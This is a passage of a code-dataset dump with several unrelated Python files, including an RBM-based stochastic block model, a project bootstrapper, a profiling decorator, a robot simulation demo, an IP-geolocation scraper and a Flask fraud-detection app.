CD\n self.y_samples = None\n\n def rbm_sample(self, y=None, z=None, chain_length=10, num_samples=1, start_with_z=True):\n \"\"\"\n y: (num_samples, M) binary starting point for observable features\n z: (num_samples, K) one hot starting point for communities\n chain_length: Number of steps to take for Gibbs sampling\n num_samples: Number of samples to generate\n start_with_z: Whether to start the Gibbs chain by sampling z\n returns: y, z\n y: (num_samples, M) Sampled y values\n z: (num_samples, K) Sampled z values\n \"\"\"\n if y is None:\n y = (np.random.random(size=(num_samples, self.M)) <= 0.5).astype(float)\n\n if z is None:\n idx = np.random.choice(self.K, size=num_samples, replace=True)\n z = np.zeros((num_samples, self.K))\n z[np.arange(num_samples), idx] = 1\n\n for _ in range(chain_length):\n if start_with_z:\n z = softmax(np.matmul(y, self.W) + self.c.repeat(num_samples, axis=1).T) # num_samples x K\n idx = [np.random.choice(self.K, size=1, p=z[i, :])[0] for i in range(num_samples)]\n z = np.zeros((num_samples, self.K))\n z[np.arange(num_samples), idx] = 1\n y = sigmoid(np.matmul(z, self.W.T) + self.b.repeat(num_samples, axis=1).T) # num_samples x M\n y = (np.random.random(y.shape) <= y).astype(float)\n else:\n y = sigmoid(np.matmul(z, self.W.T) + self.b.repeat(num_samples, axis=1).T) # num_samples x M\n y = (np.random.random(y.shape) <= y).astype(float)\n z = softmax(np.matmul(y, self.W) + self.c.repeat(num_samples, axis=1).T) # num_samples x K\n idx = [np.random.choice(self.K, size=1, p=z[i, :])[0] for i in range(num_samples)]\n z = np.zeros((num_samples, self.K))\n z[np.arange(num_samples), idx] = 1\n z = softmax(np.matmul(y, self.W) + self.c.repeat(num_samples, axis=1).T)\n return y, z\n\n def variational_e_step(self, edges, unknown_edges, A, A_unk, Y, indices=None, lamda=0.5):\n \"\"\"\n :param edges: List of edges in the network\n :param unknown_edges: List of edges for which no information is available\n :param A: (N, N) binary adjacency matrix, make sure A[i, j] = 0 if edge (i, j) is missing\n :param A_unk: (N, N) binary matrix containing 1's at position where presence of edge is unknown\n :param Y: (N, M) binary node feature matrix\n :param lamda: Regularization parameter\n :param indices: List of indices of nodes that are to be updated\n \"\"\"\n if indices is None:\n indices = range(self.N)\n\n # Update the posterior on B\n q_prod_edges = np.zeros((self.K, self.K))\n for i, j in edges:\n q_prod_edges += np.matmul(self.q[i, :].reshape((-1, 1)), self.q[j, :].reshape((1, -1)))\n\n q_prod_missing_edges = np.zeros((self.K, self.K))\n for i, j in unknown_edges:\n q_prod_missing_edges += np.matmul(self.q[i, :].reshape((-1, 1)), self.q[j, :].reshape((1, -1)))\n\n q_sum = self.q.sum(axis=0).reshape((-1, 1))\n residue = np.matmul(self.q.T, self.q)\n q_prod_all = np.matmul(q_sum, q_sum.T) - residue\n\n self.alphas_post = q_prod_edges + self.alphas\n self.betas_post = q_prod_all - q_prod_edges - q_prod_missing_edges + self.betas\n\n # Update the posterior on community memberships\n digamma_alphas = digamma(self.alphas_post)\n digamma_betas = digamma(self.betas_post)\n digamma_sum = digamma(self.alphas_post + self.betas_post)\n\n q_alpha_prod = np.matmul(self.q, digamma_alphas)\n q_beta_prod = np.matmul(self.q, digamma_betas)\n q_sum_prod = np.matmul(self.q, digamma_sum)\n q_alpha_prod_t = np.matmul(self.q, digamma_alphas.T)\n q_beta_prod_t = np.matmul(self.q, digamma_betas.T)\n q_sum_prod_t = np.matmul(self.q, digamma_sum.T)\n\n def h(x, l=0.5):\n return (x <= 0.5) * (x**l * 2**(l-1)) + (x > 0.5) * (1 - 2**(l-1) * (1 - x)**l)\n\n for idx in indices:\n a_rep = np.asarray(A[idx, :].todense().reshape((-1, 1)).repeat(self.K, axis=1))\n a_rep_comp = np.asarray((1 - A[idx, :].todense() - A_unk[idx, :].todense()).reshape((-1, 1)).repeat(self.K, axis=1))\n\n temp1 = (a_rep * (q_alpha_prod - q_sum_prod)).sum(axis=0)\n temp2 = (a_rep_comp * (q_beta_prod - q_sum_prod)).sum(axis=0) - q_beta_prod[idx, :] + q_sum_prod[idx, :]\n\n a_rep = np.asarray(A[:, idx].todense().reshape((-1, 1)).repeat(self.K, axis=1))\n a_rep_comp = np.asarray((1 - A[:, idx].todense() - A_unk[:, idx].todense()).reshape((-1, 1)).repeat(self.K, axis=1))\n\n temp3 = (a_rep * (q_alpha_prod_t - q_sum_prod_t)).sum(axis=0)\n temp4 = (a_rep_comp * (q_beta_prod_t - q_sum_prod_t)).sum(axis=0) - q_beta_prod_t[idx, :] + \\\n q_sum_prod_t[idx, :]\n\n self.q[idx, :] = temp1 + temp2 + temp3 + temp4 + np.matmul(Y[idx, :].todense(), self.W) + self.c[:, 0]\n self.q[idx, :] = softmax(self.q[idx, :], axis=0)\n self.q[idx, :] = h(self.q[idx, :], lamda)\n self.q[idx, :] = softmax(self.q[idx, :], axis=0, take_exp=False)\n\n def variational_m_step(self, Y, num_samples=1, chain_length=10, lr=1e-2, momentum=0.0, use_persistence=False):\n \"\"\"\n :param Y: (N, M) observed binary feature matrix\n :param num_samples: Number of samples to use for approximating expectations\n :param chain_length: Length of Gibbs chain for RBM sampling\n :param lr: Learning rate for parameter updates\n :param momentum: Momentum term for SGD update\n :param use_persistence: Whether to use persistent-CD or not\n \"\"\"\n # Get samples from RBM\n if not use_persistence or self.y_samples is None:\n self.y_samples = np.asarray(Y[np.random.choice(self.N, size=num_samples), :].todense())\n y, z = self.rbm_sample(chain_length=chain_length, num_samples=num_samples, y=self.y_samples)\n self.y_samples = y\n\n # Compute gradients for RBM parameters\n grad_b = (-self.N * y.mean(axis=0) + Y.sum(axis=0)).reshape((-1, 1))\n grad_c = (-self.N * z.mean(axis=0) + self.q.sum(axis=0)).reshape((-1, 1))\n grad_W = -self.N * (np.matmul(y.T, z) / num_samples) + np.matmul(Y.T.todense(), self.q)\n\n # Update the RBM parameters\n self.grad_b = momentum * self.grad_b + (1 - momentum) * grad_b / self.N\n self.b += lr * self.grad_b\n self.grad_c = momentum * self.grad_c + (1 - momentum) * grad_c / self.N\n self.c += lr * self.grad_c\n self.grad_W = momentum * self.grad_W + (1 - momentum) * grad_W / self.N\n self.W += lr * self.grad_W\n\n self.W = self.W.clip(-5, 5)\n self.b = self.b.clip(-5, 5)\n self.c = self.c.clip(-5, 5)\n\n def predict(self, missing_edges):\n \"\"\"\n :param missing_edges: List of missing edges\n :return: probs\n probs: Probability of missing edges\n \"\"\"\n B = (self.alphas_post) / (self.alphas_post + self.betas_post + 1e-12)\n probs = []\n for i, j in missing_edges:\n probs.append(np.matmul(np.matmul(self.q[i, :].reshape((1, -1)), B), self.q[j, :].reshape((-1, 1)))[0, 0])\n\n return probs\n\n\nif __name__ == '__main__':\n model = RBMSBM(N=100, K=5, M=10)\n","sub_path":"model_base_rbsbm_link_pred.py","file_name":"model_base_rbsbm_link_pred.py","file_ext":"py","file_size_in_byte":9431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"479265543","text":"#-- smash.bang.tree\n\n\"\"\"\n\"\"\"\n\nfrom powertools import AutoLogger\nlog = AutoLogger()\n\n################################\n\nfrom powertools import term\nfrom ..util import out\nfrom ..util.out import rprint\nfrom pprint import pprint, pformat\n\nfrom pathlib import Path\nfrom shutil import copyfile\nfrom contextlib import suppress\nfrom itertools import chain\n\nfrom powertools import export\nfrom ..core.config import Config\nfrom ..core.env import InstanceEnvironment\n\nfrom .. import templates\n\nimport wget\nfrom ..core import platform\nPlatform = platform.match()\n\nfrom ..core.pkg import Miniconda\n\n#----------------------------------------------------------------------------------------------#\n\ndef write_root( homepath: Path, root_file=None ) :\n ''' strap your boots with hard-coded paths '''\n\n if root_file is None :\n src = str( templates.INSTANCE_BLANK )\n dst = str( Path( homepath ) / templates.ROOT_YAMLispNode )\n print( term.cyan('writing root config: '), term.dyellow(src), \"-->\", term.dyellow(dst), '\\n' )\n copyfile( src, dst )\n\n src = str( templates.SMASH_PY )\n dst = str( Path( homepath ) / templates.SMASH_PY.name )\n print( term.cyan( 'writing smash.py: ' ), term.dyellow( src ), \"-->\", term.dyellow( dst ), '\\n' )\n copyfile( src, dst )\n\n\n################################\n\ndef create_pathsystem( config:Config, instance:InstanceEnvironment ) :\n ''' create directories in config's path and pkg sections '''\n\n paths = chain(\n config[templates.PATH_VARS_SECTION].allpaths(),\n config[templates.BOX_SECTION].allpaths(),\n )\n for key, path in paths:\n with suppress( FileExistsError ) :\n log.info( term.pink( 'MKDIR: ' ), f\"{str(path):<16}\" )\n absolute_path = instance.mkdir( path )\n\n\n\n\n################################\n\ndef install_package( config:Config, template_path, pkg_name):\n for filename in [\n templates.NIX_YAMLispNode,\n templates.WIN_YAMLispNode,\n templates.MAC_YAMLispNode,\n templates.PKG_YAMLispNode,\n ]:\n src = str( template_path / filename )\n dst = str( Path(config[templates.BOX_SECTION][pkg_name]) / filename)\n\n # with suppress(FileNotFoundError):\n try:\n copyfile( src, dst )\n log.print( term.cyan('writing ',pkg_name,' package config: '),\n '',term.dyellow(src),\n ' --> ', term.dyellow(dst),\n '\\n')\n config.tree.add_node(Path(dst))\n\n except FileNotFoundError as e:\n print(e)\n\n\n\n\ndef install_default_packages( config:Config ):\n ''' copy additional YAMLispNode files '''\n\n install_package( config, templates.NET, 'PLATFORM' )\n install_package( config, templates.HOST, 'HOST' )\n install_package( config, templates.NET, 'NET' )\n\n install_package( config, templates.PYTHON, 'PYTHON' )\n\n\n#----------------------------------------------------------------------------------------------#\n\ndef new( homepath: Path, **kwargs ) -> InstanceEnvironment:\n\n log.print( term.pink( '\\ncreating new instance in current directory... '), homepath.name )\n\n ###\n Path( homepath ).mkdir( 0o600 )\n write_root( homepath )\n\n ### inherit context as a parent from kwargs # todo: explicit argument\n instance = InstanceEnvironment( homepath, **kwargs )\n config = instance.configtree.env\n\n ###\n log.print( term.pink( '\\ncreating subdirectories... ' ) )\n create_pathsystem( config, instance )\n\n ###\n log.print( term.pink( '\\ninstalling smash prerequisites... ' ) )\n install_default_packages( config )\n\n ###\n log.print( term.pink( '\\ninstalling self-contained python...' ) )\n with Miniconda(instance, config) as mc:\n mc.download()\n mc.install()\n\n log.info(mc)\n\n return instance\n\n\n#----------------------------------------------------------------------------------------------#\n","sub_path":"smash/bang/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":3963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"336140616","text":"from functools import wraps\nimport time\nimport inspect\nimport re\n \n \ndef profile(to_decorate):\n if inspect.isfunction(to_decorate):\n function_name_format = re.compile('(?P.*) (?P.*) (?P.*) (?P.*)')\n match = function_name_format.match(repr(to_decorate))\n if not match:\n raise Exception('Incorrect func_name format')\n \n @wraps(to_decorate)\n def wrapper(*args, **kwargs):\n name = match.group('name')\n print(f'\\'{name}\\' started')\n start_time = time.time()\n result = to_decorate(*args, **kwargs)\n time_spend = start_time - time.time()\n print(f'\\'{name}\\' finished in {time_spend}s')\n return result\n return wrapper\n elif inspect.isclass(to_decorate):\n for attribute in to_decorate.__dict__:\n if inspect.isfunction(getattr(to_decorate, attribute)):\n setattr(to_decorate, attribute, profile(getattr(to_decorate, attribute)))\n return to_decorate\n else:\n raise Exception('Type of decorating obj should be func or class')","sub_path":"meta_programming/profile_decorator/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"593394007","text":"from gibson2.robots.tiago_single_robot import Tiago_Single\nfrom gibson2.robots.tiago_dual_robot import Tiago_Dual\nfrom gibson2.utils.utils import parse_config\nimport os\nimport time\nimport numpy as np\nimport pybullet as p\nimport pybullet_data\n\ndef main():\n p.connect(p.GUI)\n p.setGravity(0,0,-9.8)\n p.setTimeStep(1./240.)\n\n floor = os.path.join(pybullet_data.getDataPath(), \"mjcf/ground_plane.xml\")\n p.loadMJCF(floor)\n\n\n robots = []\n config = parse_config('../configs/tiago_single_point_nav.yaml')\n tiago = Tiago_Single(config)\n robots.append(tiago)\n\n config = parse_config('../configs/tiago_dual_point_nav.yaml')\n tiago = Tiago_Dual(config)\n robots.append(tiago)\n\n positions = [\n #[0, 0, 0],\n [1, 0, 1],\n [0, 1, 1],\n ]\n\n for robot, position in zip(robots, positions):\n robot.load()\n robot.set_position(position)\n robot.robot_specific_reset()\n robot.keep_still()\n\n secs = 2\n print(\"Keep still for {} seconds\".format(secs))\n for _ in range(240 * secs):\n p.stepSimulation()\n time.sleep(1./240.)\n\n secs = 30\n print(\"Small movements for {} seconds\".format(secs))\n for _ in range(240 * secs): # move with small random actions for 10 seconds\n for robot, position in zip(robots, positions):\n #action = np.random.uniform(-1, 1, robot.action_dim)\n action = np.zeros(robot.action_dim)\n x = 0\n y = robot.wheel_dim\n action[x:y] = 0.1\n x = y\n y += robot.torso_lift_dim\n action[x:y] = 0.2\n x = y\n y += robot.head_dim\n action[x:y] = 0.3\n\n #action[y+3] = 0.3\n\n robot.apply_action(action)\n p.stepSimulation()\n time.sleep(1./240.0)\n\n p.disconnect()\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"gibson2/examples/demo/tiago_example.py","file_name":"tiago_example.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"295509951","text":"from JavaClassReader import JavaClassReader\nfrom JavaLangObject import JavaMethod\nimport collections\nimport re\n\n#filename = 'ViewDragHelper.java'\nfilename = 'SwipeBackLayout.java'\nclassReader = JavaClassReader(filename)\nmethodList = classReader.getMethods()\n\nmethodNameList = []\norder_maps = collections.OrderedDict()\nfor methodStr in methodList:\n methodObj = JavaMethod(methodStr)\n name = methodObj.getMethodName()\n if(re.match('\\w', name.strip())):\n methodNameList.append(name.strip())\n order_maps[name.strip()] = methodStr\n\nresult_maps = collections.OrderedDict()\n\nfor m_name, m_str in order_maps.items():\n sub_method_list = []\n for method_name in methodNameList:\n if method_name in m_str and method_name.strip() != m_name.strip():\n sub_method_list.append(method_name)\n\n result_maps[m_name] = sub_method_list\n\nprint(filename)\nfor m_name, sub_methods in result_maps.items():\n print('~ ' + m_name)\n if(sub_methods):\n for sub_m in sub_methods:\n print('-- ' + sub_m)\n print()\n\n#print(classReader.getFields())\n","sub_path":"me/chilling/JavaCode/JavaCodeReader/CodeFuctionAnalyzer.py","file_name":"CodeFuctionAnalyzer.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"647799544","text":"import random,requests,csv,re\nrequestKey=\"9c1d646fd4dfda77b5f434c958d7b960\"#https://ipstack.com请求参数\ndef randIP():\n a = random.randint(1, 128)\n b = random.randint(0, 255)\n c = random.randint(0, 255)\n d = random.randint(0, 255)\n ip = str(a) + '.' + str(b) + '.' + str(c) + '.' + str(d)\n return ip\ndef getLat_free(ip):\n \"\"\"\n 免费接口\n :param ip:\n :return:\n \"\"\"\n url=\"http://ip-api.com/json/%s?fields=520191&lang=en\"%ip\n result=requests.get(url,timeout=5)\n infoList=[]\n lat = \"\".join(re.findall(r'\"lat\":(.*?),', result.text))\n lon=\"\".join(re.findall(r'\"lon\":(.*?),', result.text))\n infoList.append(lat)\n infoList.append(lon)\n return infoList\ndef getLat_maxmind(ip):\n \"\"\"\n 免费接口\n :param ip:\n :return:\n \"\"\"\n url=\"https://geoip.maxmind.com/geoip/v2.1/insights/%s?demo=\"%ip\n result=requests.get(url,timeout=5)\n infoList=[]\n lat = \"\".join(re.findall(r'\"latitude\":(.*?),', result.text))\n lon=\"\".join(re.findall(r'\"longitude\":(.*?),', result.text))\n infoList.append(lat)\n infoList.append(lon)\n return infoList\ndef getLat_ipstack(ip):\n \"\"\"\n 收费接口的免费版,每月1w次调用\n :param ip:\n :return:\n \"\"\"\n url=\"http://api.ipstack.com/%s?access_key=9c1d646fd4dfda77b5f434c958d7b960\"%ip\n result=requests.get(url,timeout=5)\n infoList=[]\n lat = \"\".join(re.findall(r'\"latitude\":(.*?),', result.text))\n lon=\"\".join(re.findall(r'\"longitude\":(.*?),', result.text))\n infoList.append(lat)\n infoList.append(lon)\n return infoList\ndef getLat_iplocation(ip):\n url = \"https://iplocation.com/\"\n data = {\"ip\": \"%s\" % ip}\n result = requests.post(url, data=data,timeout=5)\n infoList=[]\n lat = \"\".join(re.findall(r'\"lat\":(.*?),', result.text))\n lon=\"\".join(re.findall(r'\"lng\":(.*?),', result.text))\n infoList.append(lat)\n infoList.append(lon)\n return infoList\n# 文件头,一般就是数据名\nfileHeader = [\"ipAddress\",'lat_free','lat_ipstack','lat_iplocation','lon_free','lon_ipstack','lon_iplocation']\n\n# 假设我们要写入的是以下两行数据\n\n# 写入数据\n\ncsvFile = open(\"D:/文档/ipAddress.csv\",'a',newline='')\nwriter = csv.writer(csvFile)\nwriter.writerow(fileHeader)\nnum=0\nwhile num <500:\n info_list=[]\n ip = randIP()\n info_free=getLat_free(ip)\n info_ipstack=getLat_ipstack(ip)\n # info_maxmind=getLat_maxmind(ip)\n info_iplocation = getLat_iplocation(ip)\n # print(info_free,\"***\",info_ipstack)\n info_list.append(ip)\n info_list.append(info_free[0])\n info_list.append(info_ipstack[0])\n info_list.append(info_iplocation[0])\n info_list.append(info_free[1])\n info_list.append(info_ipstack[1])\n info_list.append(info_iplocation[1])\n # print(type(info),type(ip))\n writer.writerow(info_list)\n num+=1\n print(\"已写入%s条数据\"%num,info_list)\ncsvFile.close()\n","sub_path":"ip_to_lat_lon.py","file_name":"ip_to_lat_lon.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"338586126","text":"# -------------------------------------------------------------------------\n# Copyright (c) 2020, PTC Inc. and/or all its affiliates. All rights reserved.\n# See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\n\nimport setuptools\nimport sys\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nprint(\"Arguments list: \", str(sys.argv))\nif len(sys.argv) < 4:\n print(\"Not enough arguments. Arguments list: \", str(sys.argv))\nelse:\n version = sys.argv[1]\n sys.argv.pop(1)\n setuptools.setup(\n name=\"kepconfig\",\n version= version,\n author=\"PTC Inc\",\n # author_email=\"author@example.com\",\n\n description=\"SDK package for Kepware Configuration API\",\n keywords=\"Kepware OPC Configuration Thingworx\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"TBD\",\n project_urls={},\n packages=setuptools.find_packages(),\n classifiers=[\n \"Development Status :: 4 - Beta\",\n 'License :: OSI Approved :: MIT License',\n \"Programming Language :: Python :: 3\",\n \"Operating System :: OS Independent\",\n \"Intended Audience :: Manufacturing\",\n ],\n python_requires='>=3.6',\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"142444215","text":"#!/usr/bin/env python\n# coding: utf-8\n# %%\n\n# %%\n\n\nfrom flask import Flask, render_template,request\nimport plotly\nimport plotly.graph_objs as go\nimport plotly.express as px\nfrom sklearn.manifold import TSNE\nimport pandas as pd\nimport numpy as np\nimport sys\nimport pickle\nnp.set_printoptions(threshold=sys.maxsize)\nimport json\napp = Flask(__name__)\n\nfrom sklearn.metrics import classification_report,accuracy_score, confusion_matrix,f1_score, roc_auc_score, roc_curve, precision_recall_curve, auc, balanced_accuracy_score, fbeta_score, recall_score, precision_score\nfrom sklearn.preprocessing import RobustScaler\nfrom sklearn.feature_selection import SelectKBest, chi2 , SelectPercentile , f_classif\nimport random\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_selection import VarianceThreshold\nfrom sklearn.linear_model import LogisticRegression, LogisticRegressionCV\nfrom sklearn.ensemble import RandomForestClassifier\n# %%\n\n\ndata = pd.read_csv('mlflow/data/creditcard.csv')\ndata_RUS=pd.read_csv('mlflow/data/creditcard_RUS_8feat.csv')\ntsne= pd.read_csv('mlflow/data/tsneData.csv')\n# %%\ndata_RUS\n\n# %%\n\n\ndef plotBar(column,layout):\n trace = [\n go.Bar(\n x = ['NonFraud', 'Fraud'],\n y = data[column].value_counts()\n )\n ]\n \n layout = go.Layout(title = layout['title'],\n xaxis_title=layout['x_axis'],\n yaxis_title=layout['y_axis'],\n width=600,\n height=600)\n fig = go.Figure(data = trace, layout = layout)\n bar = {'trace':trace, 'layout':layout}\n graphJSON = json.dumps(bar, cls=plotly.utils.PlotlyJSONEncoder)\n\n return graphJSON\n\n\n# %%\n\n\ndef plotBarh(Xs, Ys, layouts):\n trace = [\n go.Bar(\n x=Xs,\n y=Ys,\n orientation='h') \n ]\n \n layout = go.Layout(title = layouts['title'],\n xaxis_title=layouts['x_axis'],\n yaxis_title=layouts['y_axis'],\n height=600)\n fig = go.Figure(data = trace, layout = layout)\n bar = {'trace':trace, 'layout':layout}\n graphJSON = json.dumps(bar, cls=plotly.utils.PlotlyJSONEncoder)\n\n return graphJSON\n\n\n# %%\n\n\n\ndef scatterplot(y0, y1,layouts):\n trace = go.Scatter(\n x=y0[:,0],\n y=y0[:,1],\n name='No Fraud',\n mode='markers',\n marker_color='rgba(152, 0, 0, .8)' \n )\n \n trace2 = go.Scatter(\n x=y1[:,0],\n y=y1[:,1],\n name='Fraud',\n mode='markers',\n marker_color='rgba(12, 150, 150, .8)' \n )\n \n \n layout = go.Layout(title = layouts['title'],\n xaxis_title=layouts['x_axis'],\n yaxis_title=layouts['y_axis'],\n height=600)\n fig = go.Figure(data = [trace, trace2], layout = layout)\n bar = {'trace':trace, 'layout':layout}\n graphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\n return graphJSON\n\n\n# %%\n\n\ndef getheatMap(dataSet, layout):\n layout = go.Layout(title = layout['title'],\n xaxis_title=layout['x_axis'],\n yaxis_title=layout['y_axis'],\n height=1000)\n \n trace = go.Heatmap(\n z=dataSet.values,\n x=dataSet.columns,\n y=dataSet.columns,\n colorscale='Viridis')\n \n fig = go.Figure(data = trace, layout = layout)\n return json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\n\n# %%\n\ndef randomForestSelectorRanges(X, y, min, max,layouts):\n model = RandomForestClassifier(random_state=0, max_depth=10).fit(X, y)\n features = X.columns\n importances = model.feature_importances_\n thresholds = []\n praucs = []\n accuracys = []\n recalls = []\n precisions = []\n for i in range(min, max):\n indices = np.argsort(importances)[-i:]\n foreset_variable = [features[i] for i in indices]\n x_train , x_test,y_train, y_test = train_test_split(X[foreset_variable ], y, test_size=0.3, random_state=42, stratify=y)\n clf = LogisticRegression(random_state=0, C=0.1).fit(x_train, y_train)\n y_pred = clf.predict(x_test)\n probs = clf.predict_proba(x_test)\n probs_rfs = probs[:,1]\n precision, recall, _ = precision_recall_curve(y_test, probs_rfs)\n prauc = auc(recall, precision)\n thresholds.append(i)\n praucs.append(prauc)\n accuracys.append(accuracy_score(y_pred, y_test))\n recalls.append(recall_score(y_pred, y_test))\n precisions.append(precision_score(y_pred, y_test))\n trace = go.Scatter(\n x=thresholds,\n y=praucs,\n name='praucs',\n mode='lines+markers',\n marker_color='rgba(152, 0, 0, .8)' \n )\n \n trace2 = go.Scatter(\n x=thresholds,\n y=accuracys,\n name='accuracy',\n mode='lines+markers',\n marker_color='rgba(12, 150, 150, .8)' \n )\n trace3 = go.Scatter(\n x=thresholds,\n y=recalls,\n name='recall',\n mode='lines+markers',\n marker_color='rgba(15, 150, 0, .8)' \n )\n \n trace4 = go.Scatter(\n x=thresholds,\n y=precisions,\n name='precision',\n mode='lines+markers',\n marker_color='rgba(120, 150, 15, .5)' \n )\n \n \n layout = go.Layout(title = layouts['title'],\n xaxis_title=layouts['x_axis'],\n yaxis_title=layouts['y_axis'],\n height=600)\n fig = go.Figure(data = [trace, trace2,trace3, trace4], layout = layout)\n bar = {'trace':trace, 'layout':layout}\n graphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\n return graphJSON\n\n# %%\n\n# on prend le meme nombre de données frauduleuses et normales\nfraud_df = data.loc[data['Class'] == 1]\nnon_fraud_df = data.loc[data['Class'] == 0][:492]\n\nnormal_distributed_df = pd.concat([fraud_df, non_fraud_df])\nnew_df = normal_distributed_df.sample(frac=1, random_state=42)\n\n\n# %%\n\n\n#model=pickle.load(open('model.pkl','rb'))\n\n\n# %%\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n# %%\n\n\n@app.route('/stats')\ndef stats():\n lableBar = plotBar('Class', {\"title\": \"Transaction Class Distribution\", \"x_axis\": \"class\", \"y_axis\": \"Frequency\"})\n features=randomForestSelectorRanges(data_RUS.drop(['Class'],axis=1) ,data_RUS['Class'] , 2, 29,{\"title\": \"Feature importance\", \"x_axis\": \"Number of features\", \"y_axis\": \"Metrics\"})\n tsnePlot = scatterplot(tsne[tsne['Y_gans'] == 0].values, tsne[tsne['Y_gans'] == 1].values,{\"title\": \"Tsne Plot\", \"x_axis\": \"First Component\", \"y_axis\": \"Second Component\"})\n lableBarh = plotBarh([0.030, 0.060, 0.068, 0.080, 0.090, 0.100, 0.15, 0.200], ['V7' ,'V3' ,'V11' ,'V4' ,'V12' ,'V17' ,'V10' ,'V14'], {\"title\": \"feature importance\", \"x_axis\": \"Relative importance\", \"y_axis\": \"Features\"})\n return render_template('stats.html', plot=lableBar, feature_metrics = features, featureImportance=lableBarh, tsne = tsnePlot)\n\n\n# %%\n\n\n@app.route('/result', methods=['POST'])\ndef result():\n \n \"\"\"\n features=[float(x) for x in request.form.values()]\n final_features = [np.array(features)]\n \"\"\"\n features = [request.form.get('v3') ,request.form.get('v4') ,request.form.get('v7') \n ,request.form.get('v10') ,request.form.get('v11') ,request.form.get('v12') \n ,request.form.get('v14') ,request.form.get('v17') ]\n final_features = [np.array(features)]\n \n if request.form.get('sampling') == \"RUS\":\n if request.form.get('algo') == \"lr\":\n model=pickle.load(open('mlflow/mlruns/0/0dfb03dacddc494cb2849e19d31c2b4c/artifacts/model/model.pkl','rb'))\n elif request.form.get('algo') == \"xgb\":\n model=pickle.load(open('mlflow/mlruns/0/f0d6d999937a4199985eaa58b778686f/artifacts/model/model.pkl','rb'))\n elif request.form.get('algo') == \"rf\":\n model=pickle.load(open('mlflow/mlruns/0/6bf50f0b5f244baca58e168d68c55dea/artifacts/model/model.pkl','rb'))\n elif request.form.get('algo') == \"ANN\":\n model=pickle.load(open('mlflow/mlruns/0/495b1e8ebfc8443f98974d0af3856acd/artifacts/model/model.pkl','rb'))\n \n elif request.form.get('sampling') == \"SMOTE\":\n if request.form.get('algo') == \"lr\":\n model=pickle.load(open('mlflow/mlruns/0/0dfb03dacddc494cb2849e19d31c2b4c/artifacts/model/model.pkl','rb'))\n if request.form.get('algo') == \"rf\":\n model=pickle.load(open('mlflow/mlruns/0/ae819c72690c4c7d93cb4d73a376fe96/artifacts/model/model.pkl','rb'))\n if request.form.get('algo') == \"xgb\":\n model=pickle.load(open('mlflow/mlruns/0/f1400c1216274ef4857377b956483ef8/artifacts/model/model.pkl','rb'))\n if request.form.get('algo') == \"ANN\":\n model=pickle.load(open('mlflow/mlruns/0/8c117c47fc6f409d9173d1537909e035/artifacts/model/model.pkl','rb'))\n \n \n elif request.form.get('sampling') == \"GANS\":\n if request.form.get('algo') == \"lr\":\n model=pickle.load(open('mlflow/mlruns/0/730f30c0b5ca498a95b4b03cae93efea/artifacts/model/model.pkl','rb'))\n if request.form.get('algo') == \"rf\":\n model=pickle.load(open('mlflow/mlruns/0/6a08d87d70c540889d8493846327a10c/artifacts/model/model.pkl','rb'))\n if request.form.get('algo') == \"xgb\":\n model=pickle.load(open('mlflow/mlruns/0/742450ef710b497d859d503ea163799f/artifacts/model/model.pkl','rb'))\n if request.form.get('algo') == \"ANN\":\n model=pickle.load(open('mlflow/mlruns/0/f8e45da5878e4e86bd3a306d2c2e4b8c/artifacts/model/model.pkl','rb'))\n else :\n model = None\n \n if request.form.get('algo') == \"ANN\":\n if model.predict_classes(final_features) == 0:\n proba = round(model.predict_proba(final_features)[0][0]*100, 2)\n pred = \"NO Fraud\"\n elif model.predict_classes(final_features) == 1:\n proba = round(model.predict_proba(final_features)[0][1]*100, 2)\n pred = \"Fraud\"\n else :\n proba = \"Error\"\n pred = \"Error\"\n else :\n if model.predict(final_features) == 0:\n proba = round(model.predict_proba(final_features)[0][0]*100, 2)\n pred = \"NO Fraud\"\n elif model.predict(final_features) == 1:\n proba = round(model.predict_proba(final_features)[0][1]*100, 2)\n pred = \"Fraud\"\n else :\n proba = \"Error\"\n pred = \"Error\"\n \n #return render_template('predict.html', proba=proba, pred=pred)\n return model\n\n\n# %%\n\n\n@app.route('/predict')\ndef predict():\n return render_template('predict.html', proba=None, pred=None, predict=None)\n\n\n# %%\n\n@app.route('/predict_file', methods=['POST'])\ndef predict_file():\n transaction= request.files['fichier']\n transac_df= pd.read_csv(transaction)\n \n predict = model.predict(transac_df)\n \n return render_template('predict.html',predict=predict )\n\n# %%\n\nif __name__ == \"__main__\":\n app.run(debug=True, use_reloader=False)\n\n\n# %%\n\n\n\n\n\n# %%\n\n\n\n\n\n# %%\n\n\n\n\n","sub_path":".ipynb_checkpoints/app-checkpoint.py","file_name":"app-checkpoint.py","file_ext":"py","file_size_in_byte":11242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"431741121","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nclass MatPlotPloter:\n def __init__(self):\n \"\"\"\n keep track of the figure number so that graphs won't be printed on the same figure\n \"\"\"\n self.figure = 1\n\n def scatterPlot(self, X, Y):\n \"\"\"\n do a scatter plot with two lists x and 